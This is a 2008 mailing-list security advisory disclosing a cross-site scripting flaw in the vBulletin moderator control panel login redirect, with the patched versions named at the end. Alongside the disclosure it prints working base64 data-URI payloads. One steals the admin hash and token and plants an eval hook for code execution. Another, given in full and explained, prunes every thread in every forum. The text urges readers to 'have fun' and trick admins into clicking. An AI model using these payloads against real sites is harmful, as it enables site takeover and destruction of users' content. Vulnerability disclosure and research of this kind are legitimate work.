lists.openwall.net - Open Source and information security mailing list archives
Date: Thu, 19 Jun 2008 14:09:38 +0100
From: "Jessica Hope" <jessicasaulhope@...glemail.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, jessicasaulhope@...glemail.com
Subject: vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index

======================================================================
Advisory     : XSS in modcp index
Release Date : June 17th 2008
Application  : vBulletin
Version      : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower
Platform     : PHP
Vendor URL   : http://www.vbulletin.com/
Authors      : Jessica Hope (jessicasaulhope@...glemail.com), friends who wish to remain anonymous.
=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the login page for the MCP (moderation control panel). The login script takes a redirect parameter that is not sanitised, allowing a rather easy XSS:

http://localhost/vB3/modcp/index.php?redirect={XSS}

Even better, the exploit works outright if the admin/moderator is already logged in; if not, they will simply be asked to log in first. Note that when an admin logs into the MCP, he is also logged into the ACP, which allows the same exploit as last time (remote PHP code injection via the hooks system). If you Base64-encode your attack vector using the data: URI scheme, the XSS survives the login request and activates once the admin/moderator is logged in. A simple example of the above:

http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

(The Base64 part decodes to <script>alert('XSS')</script>.) In this case (as in the last case), you have an unlimited and unaltered XSS space, so you're free to invoke some AJAX and have fun.
Just to give ideas on how this could turn into something larger, vBulletin has hooks that operate using eval(), and new hooks can be added via the ACP itself. It is trivial to write some JS that not only enables hooks but also inserts a nice RFI hook. Here's one using the data URI:

data:text/html;base64,[...]O3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K

The above will survive a login prompt. Once executed, it parses one of the ACP pages and extracts the admin hash and security token, then enables hooks and adds one that executes phpinfo(). Obviously the above requires an admin in this context. Similar techniques could be used to exploit the modcp as usual: banning users, enabling the pruning of threads, etc. If you just want to cause annoyance, you can easily exploit only a moderator (and thus have more success in the exploit being run).
This example enables pruning for all forums on all posts:

data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbmRleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcysnbGFzdGRheXNuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdHlwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==

Decoded, this payload is a <script> that fetches modcp/thread.php?do=prune with the victim's session, reads the adminhash and securitytoken out of the response, POSTs a prune whose thread[...] criteria match every thread in every forum (forumid=-1, subforums=1), and then submits the returned criteria to do=dothreadsall to confirm the prune. In order to exploit, just get an admin/moderator to click the link.

=======================================================================

Solution: Update to 3.7.1 PL2 or 3.6.10 PL2

=======================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/